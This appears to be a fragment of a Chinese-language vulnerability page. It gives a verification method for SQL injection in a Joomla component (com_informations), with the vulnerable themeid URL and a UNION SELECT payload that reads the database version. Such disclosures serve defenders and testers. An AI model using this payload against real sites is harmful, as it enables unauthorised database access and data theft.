<h3>验证方法:</h3><pre class="lang-sql" data-lang="sql">
http://[target]/index.php?option=com_informations&view=sousthemes&themeid=-3 (SQLI)
Injected column is # 3
http://[target]//index.php?option=com_informations&view=sousthemes&themeid=999.9+union+select+111,222,version()%23</pre>
全部评论 (3)